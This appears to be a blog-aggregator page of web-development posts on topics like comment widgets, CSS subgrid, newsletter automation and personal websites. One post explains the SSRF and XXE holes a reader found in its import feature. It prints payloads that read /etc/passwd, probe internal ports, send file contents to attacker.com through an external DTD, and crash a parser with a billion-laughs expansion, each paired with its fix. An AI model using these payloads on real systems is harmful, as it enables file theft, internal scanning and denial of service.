Posts in Web-development (20 found)
pabloecortez 2 days ago

Black Friday for You and Me

Yesterday was Thanksgiving and I had the privilege of spending the holiday with my family. We have a tradition of doing a toast going around the table and sharing at least one thing for which we are grateful. I want to share with you a story that started last year, in January of 2024, when a family friend named Germán reached out to me for help with a website for his business. Germán is in his 50s, he went to school for mechanical engineering in Mexico and about twenty years ago he moved to the United States. Today he owns a restaurant in Las Vegas with his wife and also runs a logistics company for distributing produce.

We met the last week of January. He told me that he was looking to build a website for his restaurant and eventually build up his infrastructure so most of his business could be automated. His current workflow required his two sons to run the business along with him. They managed everything manually on expensive proprietary software. There were lots of things that could be optimized, so I agreed to jump on board and we have been collaborating ever since.

What I assumed would be a developer type of position instead became more of a peer-mentorship relationship. Germán is curious, intelligent, and hardworking. It didn't take long for me to notice that he didn't just want to have software or services running "in the background" while he occupied himself with other tasks. He wanted to have a thorough understanding of all the software he adopted. "I want to learn but I simply don't have the patience," he told me during one of our first meetings. At first I admit I thought this was a bit of a red flag (sorry Germán haha) but it all began to make sense when he showed me his books. He had paid thousands of dollars for a WordPress website that only listed his services and contact information. The company he had hired offered an expensive SEO package for a monthly fee.
My time in open source and the indieweb had blinded me to how abusive the "web development" industry had become. I'm referring to those local agencies that take advantage of unsuspecting clients and charge them for every little thing. I began making Germán's website and we went back and forth on assets, copy, menus; we began putting together a project and everything went smoothly. He was happy that he got to see how I built things. During this time I would journal through my work on his project and e-mail my notes to him. He loved it.

Next came a new proposition. While the static site was nice to have an online presence, what he was after was getting into e-commerce. His wife, Sarah, makes artisanal beauty products and custom clothes. Her friends would message her on Facebook to ask what new stuff she was working on and she would send pictures to them from her phone. She would have benefitted from having a website, but after the bad experience they had had with the agency, they weren't too enthused about the prospect of hiring them for another project.

I met with both of them again for this new project and we talked for hours, more like coworkers this time around. We eventually came to the conclusion that it would be more rewarding for them to really learn how to put their own shop together. I acted more as a coach or mentor than a developer. We'd sit together and activate accounts, fill out pages, choose themes. I was providing a safe space for them to be curious about technology, make mistakes, learn from them, and immediately get feedback on technical details so they could stay on a safe path. I'm so grateful for that opportunity afforded to me by Germán and his family. I've thought about how that approach would look if applied to the indieweb. It's always so exciting for me to see what the friends I've made here are working on.
I know the open web becomes stronger when more independent projects are released, as we have more options to free ourselves from the corporate web that has stifled so much of the creativity and passion that I love and miss from the internet. I want to keep doing this. If you are building something on your own, have been out of the programming world for a while but want to start again, or maybe you are almost done and need a little boost in confidence (or accountability!) to reach the finish line and ship, I'm here to help. Check out my coaching page to find out more. I'm excited about the prospect of a community of builders who care about self-reliance and releasing software that puts people first. Perhaps this Black Friday you could choose to invest in yourself :-)

0 views
Kix Panganiban 2 days ago

Utteranc.es is really neat

It's hard to find privacy-respecting (read: not Disqus) commenting systems out there. A couple of good ones recommended by Bear are Cusdis and Komments -- but I'm not a huge fan of either of them:

Cusdis styling is very limited. You can only set it to dark or light mode, with no control over the specific HTML elements and styling. It's fine but I prefer something that looks a little neater.

Komments requires manually creating a new page for every new post that you make. The idea is that wherever you want comments, you create a page in Komments and embed that page into your webpage. So you can have 1 Komments page per blog post, or even 1 Komments page for your entire blog.

Then I realized that there's a great alternative that I've used in the past: utteranc.es. Its execution is elegant: you embed a tiny JS file on your blog posts, and it will map every page to GitHub Issues in a GitHub repo. In my case, I created this repo specifically for that purpose. Neat! I'm including utteranc.es in all my blog posts moving forward. You can check out how it looks below:
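For reference, the standard utterances embed is a single script tag along these lines — the repo value here is a placeholder you'd swap for your own public GitHub repo:

```html
<script src="https://utteranc.es/client.js"
        repo="your-username/your-comments-repo"
        issue-term="pathname"
        theme="github-light"
        crossorigin="anonymous"
        async>
</script>
```

With `issue-term="pathname"`, utterances looks up (or creates) a GitHub Issue matching each page's path and renders its comments inline.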

0 views

Imgur Geo-Blocked the UK, So I Geo-Unblocked My Entire Network

Imgur decided to block UK users. Honestly? I don’t really care that much. I haven’t actively browsed the site in years. But it used to be everywhere. Back when Reddit embedded everything on Imgur, maybe fifteen years ago, it was genuinely useful. Then Reddit built their own image hosting, Discord did the same, and Imgur slowly faded into the background. Except it never fully disappeared. And since the block, I keep stumbling across Imgur links that just show “unavailable.” It’s mildly infuriating.

0 views
Hugo 2 days ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page:

```html
<img src="https://miro.medium.com/blog/12132132/image.jpg">
```

I need to download the image, then re-upload it to Bunny.
During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny. Okay. But what happens if the user writes this:

```html
<img src="file:///etc/passwd">
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
<img src="http://localhost:6379/">
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress
}
```

But here, I still have a risk.
The user can write:

```html
<img src="https://attacker.com/image.jpg">
```

And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000

val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
...
&xxe;
```

This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly:

```xml
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?content=%file;'>">
%all;
```

Finally, to crash a server, the attacker could also have done this:

```xml
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  ...
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<item>
  <title>&lol9;</title>
  <wp:post_id>1</wp:post_id>
  <wp:status>publish</wp:status>
  <wp:post_type>post</wp:post_type>
</item>
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.
We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()

// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.
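The SSRF defences above boil down to: allow only http(s), resolve the host and reject private or loopback ranges, and refuse redirects. For readers outside the JVM, here is the address-check step sketched in Python with the standard ipaddress module — my illustration, not code from writizzy:

```python
import ipaddress
import socket

def is_private_or_localhost(host: str) -> bool:
    """Resolve host and block loopback, link-local, and private ranges."""
    try:
        # gethostbyname also accepts IP literals, returning them unchanged
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (OSError, ValueError):
        return True  # when in doubt, block it
    return addr.is_loopback or addr.is_link_local or addr.is_private

print(is_private_or_localhost("127.0.0.1"))  # True
print(is_private_or_localhost("8.8.8.8"))    # False
```

Note that, as in the Kotlin version, checking the name before making the actual request still leaves a DNS-rebinding window; pinning the resolved IP and connecting to that address closes it.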

0 views
Manuel Moreale 3 days ago

Dealgorithmed

TL;DR: I hate having spare time, and I decided to launch another newsletter called Dealgorithmed. It will start on January 1st and be delivered on the 1st and 15th of every month. It’s gonna be a discovery newsletter focused on the personal/independent/whimsical/indie web.

I spent the last 15 years of my life working on the web, coding all sorts of sites for all sorts of people. Part of me loves the web, while another part of me hates what the web is becoming. One thing I refuse to do, though, is give up on it. This idea I see floating around that the web is dead and we should just give up the whole project and start from scratch makes absolutely no sense to me. Yes, a huge chunk of the web is unbearable to use at the moment. Yes, an enormous percentage of sites are impossible to navigate without ad blockers. And yes, AI is not making the situation any better, and also yes, I am so goddamn tired of hearing AI talk nonstop everywhere all the time. All that is absolutely true.

But that’s not all the web there is out there. The web is vast. It’s probably impossible to say with certainty how big it really is, but the Internet Archive recently celebrated 1 trillion pages archived. Yes, that’s trillion with a T. You know how long it would take to count to a trillion if you could count one number every single second without ever stopping? 31,000 years. The fact that people keep browsing the same 3 sites, day after day, getting served content by algorithms controlled by 3 companies is such a shame. Because there is so much interesting content out there ready to be discovered. And discovering new content also means connecting with new people, getting exposed to new ideas, different cultures. That’s by far the best quality of the web if you ask me. The problem many people are facing is how to find that content, how to escape the algorithmic bubble. I think the only answer to that is curation.
The vast majority of people on the web are lurkers, which means someone has to spend time herding content and collecting it somewhere for others to consume. Over the years, I realised that it is probably the only reasonable contribution I can give to this cause. I’m already doing this with People and Blogs, slowly composing a list of people—and blogs—worth following and engaging with. And I’m also collecting content both on the blogroll and on the forest. If I already have these, why start something new, you might be wondering. There’s a reason for this. Two, actually.

The first reason is that I hate having spare time, apparently. And if I have to burn myself to the ground in front of a screen, I might as well do it while doing something fun and useful. The second—and more serious—reason is that all those projects have some limitations. P&B moves slowly. It’s a weekly series, which means you’re discovering at most 5 new blogs a month. Yes, there are links on those interviews, but still, this is a slow-moving project. The forest and the blogroll, on the other hand, require intention. Those are sites you need to visit in order to discover new content, and we all know it’s a lot more convenient when content comes to you, rather than the other way around.

Which is why I decided to start another newsletter. The goal with Dealgorithmed is to provide interesting content gathered from all around the web in a convenient package delivered in your inbox twice a month. Content that you can then use as a starting point for your own internet explorations. If all this sounds compelling to you, feel free to sign up. The first email should land in your inbox on January 1st.

0 views
fLaMEd fury 4 days ago

Personal Websites Aren’t Dead

What’s going on, Internet? This post “Personal Websites Are Dead” has been making the rounds this week and it’s as dumb as it sounds. Naturally, I disagree. Strongly. “Personal websites are dying because platforms got better.” “Your Substack profile is a website.” The post boils down to this: platforms are easier, reach is outsourced, maintenance is annoying, and feeds have replaced homepages. Sure. But that’s not proof personal websites are obsolete. It’s proof most people stopped valuing ownership. The web didn’t change. People did.

The tradeoff is simple. You either own your space or you rent one. Renting is convenient until the landlord changes the locks, rewrites the rules, or decides you don’t fit the algorithm today. A personal website isn’t about traffic spikes or “momentum”. It’s about autonomy. It’s about opting out of surveillance feeds, tracking, friction, and platform churn. It’s about having a corner of the internet that isn’t trying to convert, optimise, or harvest anything. If anything, the personal web movement shows the opposite of what this post shared on Medium (lol) claims. More people are tired of platform dependency. More people are building small, simple sites again. Not for reach. For identity. For community. For longevity. For personal archives and homes on the web that don’t disappear when a company pivots.

Maintenance can be a burden depending on your skill level, but it’s all part of the craft. If someone finds updating a theme (easy example - I know) too hard, fine. But it’s not evidence the personal web is dying. It’s evidence they were never that invested in the web to begin with. Which brings me back to a question I keep asking: why isn’t making websites easier by now? Personal websites aren’t dead. They’re just not fashionable. And that’s fine. The open web has always thrived on the people who keep publishing, keep tinkering, and keep owning their corner without needing permission.
The future of the web doesn’t belong to platforms. It belongs to whoever shows up and keeps building.

0 views
Josh Comeau 5 days ago

Brand New Layouts with CSS Subgrid

Subgrid allows us to extend a grid template down through the DOM tree, so that deeply-nested elements can participate in the same grid layout. At first glance, I thought this would be a helpful convenience, but it turns out that it’s so much more. Subgrid unlocks exciting new layout possibilities, stuff we couldn’t do until now. ✨
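As a minimal sketch of the idea — class names and track sizes here are invented for illustration, not taken from the article:

```css
.page {
  display: grid;
  grid-template-columns: 1fr 2fr 1fr;
}

.card {
  /* Span all three of the parent's columns... */
  grid-column: 1 / -1;
  display: grid;
  /* ...and reuse those exact column tracks for the card's own children,
     so deeply-nested elements line up with the outer grid. */
  grid-template-columns: subgrid;
}
```

Children of `.card` now place themselves on the same three column lines as elements directly inside `.page`, which is what lets nested markup participate in one shared layout.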

0 views
Jim Nielsen 1 week ago

My Number One “Resource Not Found”

The data is in. The number one requested resource on my blog which doesn’t exist is: According to Netlify’s analytics, that resource was requested 15,553 times over the last thirty days. Same story for other personal projects I manage: iOS Icon Gallery: 18,531 requests. macOS Icon Gallery: 10,565 requests. “That many requests and it serves a 404? Damn Jim, you better fix that quick!” Nah, I’m good. Why fix it? I have very little faith that the people who I want most to respect what’s in that file are going to do so. So for now, I’m good serving a 404 for . Change my mind.

0 views
Dan Moore! 1 week ago

Thankful For Memory Managed Languages

I’m thankful my software career started when memory managed languages were first available and then dominant. Or at least dominant in the areas of software that I work in–web application development. I learned BASIC, WordPerfect macros, and Logo before I went off to college. But my first real programming experience was with Pascal in a class taught by Mr. Underwood (who passed away in 2021 ). I learned for loops, print debugging and how to compile programs. Pascal supports pointers but I don’t recall doing any pointer manipulations–it was a 101 class after all. I took one more CS class where we were taught C++ but I dropped it. But my real software education came in the WCTS ; I was a student computer lab proctor. Between that and some summer internships, I learned Perl, web development and how to deal with cranky customers (aka students) when the printer didn’t work. I also learned how to install Linux (Slackware, off of something like 16 3.5-inch disks) on a used computer with a 40MB hard drive, how to buy hardware off eBay, and not to run in a C program. That last one: not good. I was also able to learn enough Java through a summer internship that I did an honors thesis in my senior year of college. I used Java RMI to build a parallelizable computation system. It did a heck of a job of calculating cosines. My first job out of school was slinging perl, then Java, for web applications at a consultancy in Boulder. I learned a ton there, including how to grind (one week I billed 96 hours), why you shouldn’t use stored procedures for a web app, how to decompile a Java application with jad to work around a bug, and how to work on a team. One throughline for all that was getting the work done as fast as possible. That meant using languages and frameworks that optimized for developer productivity rather than pure performance. Which meant using memory managed languages. 
Which are, as Joel Spolsky wrote , similar to an automatic transmission in terms of letting you just go. I have only the faintest glimmer of the pain of writing software using a language that requires memory management. Sure, it pops up from time to time, usually when I am trying to figure out a compile error when building an Apache module or Ruby gem. I google for an incantation, blindly set environment variables or modify the makefile, and hope it compiles. But I don’t have to truly understand malloc or free. I’m so thankful that I learned to program when I didn’t have to focus on the complexities of memory management. It’s hard enough to manage the data model, understand language idiosyncrasies, make sure you account for edge cases, understand the domain and the requirements, and deliver a maintainable solution without having to worry about core dumps and buffer overflows.

0 views
Rik Huijzer 1 week ago

Making IPv6 work with Caddy and Hetzner

After a few hours of fiddling, this site is now properly accessible via IPv6. My configuration uses Caddy as the reverse proxy, meaning that it forwards the requests to the right service based on the `Host` that the browser specifies. Thanks to this, one server can host hundreds if not thousands of websites from one IP. In my Caddyfile, I had specified the following

```caddyfile
www.huijzer.xyz {
    redir https://huijzer.xyz permanent
}

huijzer.xyz {
    reverse_proxy 127.0.0.1:3000
}
```

And then I thought that for IPv6 maybe this last part should have been

```caddyfile
huijzer.xyz {
    reverse_p...

0 views
Simon Willison 1 week ago

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack.

The core process is the same as I described back in 2023. I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes, and I make only very minor edits along the way.

The most important cell in the Observable notebook is this one: This uses the JavaScript function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook. Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet: My blog's URLs look like - this SQL constructs that three letter month abbreviation from the month number using a substring operation. This is a terrible way to assemble HTML, but I've stuck with it because it amuses me. The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button. Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack.
I can't remember how I figured this out but it's very effective: My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application. I use the Django admin as my CMS. Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use. My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite. My db-to-sqlite tool is responsible for that conversion. I call it like this : That command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme). can then export that data and write it to a SQLite database file called . The options specify the tables that should be included in the export. The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself. At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin: As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low.
I make very minor edits:

- I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post.
- Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example.
- Blocks of preformatted text often have an extra blank line at the end, which I remove.
- Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more.
- I pick the featured image for the newsletter and add some tags.
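The three-letter month abbreviation trick mentioned above can be sketched like this — a standalone demo of the substring technique (his actual 143-line query lives in the linked Datasette instance):

```python
import sqlite3

# In-memory database standing in for the blog's SQLite export.
conn = sqlite3.connect(":memory:")

# Index into a packed string of month abbreviations with substr(),
# using (month - 1) * 3 + 1 as the one-based starting offset.
sql = "SELECT substr('JanFebMarAprMayJunJulAugSepOctNovDec', (? - 1) * 3 + 1, 3)"

for month in (1, 5, 11):
    print(month, conn.execute(sql, (month,)).fetchone()[0])
# 1 Jan
# 5 May
# 11 Nov
```

The same expression can be inlined into a larger string-concatenation query to build URL paths that include a month abbreviation.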

0 views
W. Jason Gilmore 1 week ago

Toggling Between Fullscreen Editor and Terminal In VSCode and Cursor

November 18, 2025: This article was originally published on June 4, 2024 and later updated for clarity after I returned to it and couldn't figure out which file to modify! I've been a Vim user for decades; however, a few years ago I switched to VS Code and then subsequently Cursor for my web development work. When building modern web apps you'll spend almost as much time running shell commands as coding, so I need to have a terminal within easy reach at all times. In fact I typically keep several terminal tabs open, including one opened to the local MySQL instance, one running a worker, and one to execute various shell commands including those related to managing my Git repository. I want this transition between editor and terminal to be as seamless as possible, and so I set up two keyboard shortcuts to help me quickly move back and forth between the two. Furthermore, the transition will always open the terminal in fullscreen mode so I'm not fighting with screen real estate on a laptop. To configure these shortcuts, open the keyboard shortcuts ( ) file in JSON mode and add the following entries: I've used for the toggling shortcut, however you can switch this to whatever you'd like. If you're running Windows I suppose you would change the shortcut to or something like that. Once defined, save the changes and then try using the keyboard shortcut to switch between the two. With the terminal maximized your VS Code environment will look like this: If you have any other VS Code screen optimization tips, I'd love to hear about them! Hit me up on Twitter at @wjgilmore.
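The feed drops the actual entries, but keybindings.json entries along these lines would match the described behavior — the key choices and exact command pairing are my assumptions, not necessarily the author's (VS Code's keybindings file accepts JSONC-style comments):

```json
[
  {
    // Hypothetical: toggle the panel (terminal) between normal and fullscreen size
    "key": "ctrl+`",
    "command": "workbench.action.toggleMaximizedPanel"
  },
  {
    // Hypothetical: from a maximized terminal, jump focus back to the editor
    "key": "ctrl+escape",
    "command": "workbench.action.focusActiveEditorGroup",
    "when": "terminalFocus"
  }
]
```

Both commands are built-in, so you can also bind them through the Keyboard Shortcuts UI instead of editing the JSON directly.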

0 views
Michael Hoffmann 1 week ago

Navigating State Management in Vue: Composables, Provide/Inject, and Pinia

Explore the best practices for using Composables, Provide/Inject, and Pinia in Vue applications. Learn when to use each approach to manage state effectively in your projects, understanding the nuances that make each method suitable for different scenarios.

0 views
iDiallo 2 weeks ago

The App Developer's Attachment Issues

When browsing the web, I still follow rabbit holes. For example, I will click on a link, read an article, find another link in the body, follow that one as well, and keep on going until I get lost in the weeds and appear in wonderland. When I'm reading through my phone, I often have to go back to the browser history to see the trail of websites that led me to my destination. But sometimes, I just can't find my way back. Why? Because somehow, I wasn't reading through the web browser. I was browsing through webview.

So when you are on Instagram and click on a link shared by a friend, the page loads instantly, but something feels off. You are browsing the web, yet you don't see the familiar browser tabs or address bar. You are in a webview. Why webview and not your favorite browser? Well, this is what I call App attachment issues. App developers don't want you to leave. And webview is the invisible fence they use to keep you tethered.

When an application loads content within an in-app browser (a webview) you are, technically, using the web. It's running the same rendering engine as a dedicated browser. But the app's sole purpose for doing this is to silo you. They want to maintain control over your experience, ensuring you are never truly free to roam the open internet. The benefit for the developer is that no matter what page you browse, you are perpetually one button click away from being back in their app. It's a mechanism for user retention, a digital leash. Every company, from social media giants to news aggregators, is trying to fit you into their specific bucket, convinced that if they let you leave, you might not come back. They want to maintain that control over your experience, even when you are outside their reach. On Android, this is super annoying. You might be able to click links and navigate from the initial website to a completely different, unrelated one, but you often cannot manually change the URL.
You are trapped in the current browsing flow, unable to jump to a new destination without first leaving the app or performing a dedicated search. Why are you still under the app's thumb if you're surfing the public web? The answer is always control. The web is a dangerous place. What if you click on the wrong link and your device gets compromised? We can't protect you in that case. At least that's what it feels like when clicking on external links on some websites. For example, on LinkedIn, when you click an external link, you are often greeted with a warning message like this: "This link will take you to a page that's not on LinkedIn. Because this is an external link, we're unable to verify it for safety."

On the surface, it appears to be a helpful security measure. The platform is protecting you from the big, bad internet. But the only thing they are truly protecting you from is leaving their app. If the link was already shared by a contact or surfaced on their platform, the implicit due diligence should have been done. Serving up a blanket safety warning for any external link, even those to major news organizations or well-known websites, is just a friction point to discourage you from leaving. It's a psychological barrier designed to make you hesitate, keep you inside the known confines of their platform, and reinforce their control. This security warning is nothing more than the final, passive-aggressive plea in the app's campaign against your freedom.

If the in-app silo were just the web, but within the app, I wouldn't complain. But while developers are focused on retention, the user experience suffers in some infuriating ways. The webview is a fundamentally broken browsing experience for three core reasons. The most frustrating drawback is the lack of permanence. Your browsing history is at the mercy of the developer. They can choose to record it, or not record it.
And you will be none the wiser until you are trying to find that article you read just this morning. With my rabbit-hole style of browsing the web, I often stumble upon great articles, helpful tools, or even products that I mean to return to. But if any of those pages were viewed in a webview, they vanish without a trace.

Related to the missing history is the risk of accidental loss. You might be deep into an article, hit the back button to navigate one step back on the site, and instead, the entire webview collapses, dumping you unceremoniously back into the main app feed. Because no history was recorded, there is no way to return to the page you were just on. The article is simply gone.

There is a common counterargument that says, "Most apps have a setting to disable webview and open links directly in your full browser." But there are two points to make here. First, most people don't ever change the default settings. Second, why is this even an option to select? If the webview uses the browser engine anyway, why should the default setting be the one that compromises the user's web experience? Users do not dive into granular settings menus. The path of least resistance is the path most taken. By defaulting to webview, developers are prioritizing their retention goals over basic utility.

The entire architecture of the web is built on freedom, open access, and a unified browsing experience. By forcing a dedicated web environment, developers are fragmenting the internet and making our lives slightly harder. I'm sure there are some metrics out there that say “using in-app webview increases engagement by x%.” But for n=1, aka me, it only increases my disengagement. All I can say to developers is: it's okay to let go. The remedy for your attachment issues is user freedom. When I click a link, I expect to be in a full browser, with a permanent history, a functional address bar, and true control over my destination.
It's time for applications to trust users, respect the open web, and stop trapping us in the confines of their digital cages. For users: next time you click a link, look for that small icon, often a compass, an arrow, or an ellipsis, and choose "open in browser." It's your internet. It's okay to leave the app. Or even better, never download the apps.

0 views
Manuel Moreale 2 weeks ago

Nic Chan

This week on the People and Blogs series we have an interview with Nic Chan, whose blog can be found at nicchan.me. Tired of RSS? Read this in your browser or sign up for the newsletter. The People and Blogs series is supported by Numeric Citizen and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month.

Hi, my name is Nic Chan! I'm a web developer and hobbyist artist who lives in Hong Kong. It's pretty funny, depending on who you ask, the audience is shocked to hear about my secret other life, since I typically keep these identities very separate. If I'm not tinkering with websites or frantically mixing paint, you might find me shitposting on Mastodon, sweating through the Hong Kong summers or volunteering at the cat shelter. Despite growing up on the internet, I had never intended to be a web developer. I studied Fine Arts at a small liberal arts college in California, where I solidified a vaguely Californian accent that haunts me to this day. I entered the working world hoping to start a career that would somehow be arts related, but quickly decided that it wasn't for me. The art world, especially at higher levels, feels very inauthentic and performative in a way that left me constantly tired. During that time, I managed to convince my employer that it would save them money if I also managed their website for them, and used that opportunity as a springboard to teach myself web development. Upon reflection, I have no idea how I managed to convince them that this was a good idea. Though some engagements were longer than others, I've been a freelance web developer for around 10 years now! I'm a web generalist, but the thing I want to do more of is building sustainable and accessible websites with core web technologies. This really is the reason I continue to do what I do! I love the web as a medium, and I want to see it thrive.
The reason why I started posting on my blog was basically to prove to clients that I was a real, trustworthy person. Unfortunately, to have any sort of success as a freelancer, unless you are a literal savant, I think you need to do -some- kind of marketing, and blogging is the only method that I found acceptable to me personally. (LinkedIn was still a cesspit in 2015!) In recent years, the blog has very much drifted away from that original purpose. I now mostly post very long-form thoughts on tech industry topics, whenever I feel the need to. For some odd reason, my instructional/informative writing is not as popular as my ranting, so I will leave tech education to other folks! As far as my blog goes now, I probably spend an equal amount of time tinkering on random code parts of the site as writing blog posts. I want to explore more topics outside of web development and the tech industry in the future. My absolute favorite bloggers are the ones who 'bring their whole selves' to their blog, and post updates on their creative hobbies or whatever is on their mind at the moment. The thing I love about the IndieWeb is mostly the people behind it, so getting to bond over the little things like shared hobbies is one of the main draws for me. Fuck the technology, I'm here for the people. My blogging process is pretty simple. I might have an idea for a topic, and I'll create a file in Obsidian with as much information as I care to note down, and when I get a moment I will come back and write out the post, usually in a very linear way, in as many sittings as it takes to finish the draft. I switched to Obsidian sometime in 2025 and it really did help me get a lot more writing done than I did in years past — cloud-based SaaS solutions are fine, but apparently, if I have to log in to a website to start writing, that does pose a significant barrier to me actually getting any writing done. 
Having Obsidian just be there on my desktop removes that tiny bit of friction, and I had really underestimated how important that is to the creative process. Once a draft is done, I like to let things sit and marinate for a while, until I can read it again with 'fresh eyes.' You'll never find a super timely take on current events on my blog, I take far too long for that! I don't typically write additional drafts — call it a character flaw, but I'm far more likely to scrap an idea completely than to rework it in a substantial way. Shamefully, I have posts from over a year ago that are still about 90% complete. They will sit until I finally manage to push through whatever reservations I might have about posting and just hit the publish button. If I'm writing something more technical or industry-related, I will try to badger some folks to do a quick read-through. Special shoutout to my buddy EJ Mason for being the person who usually suffers through this task.

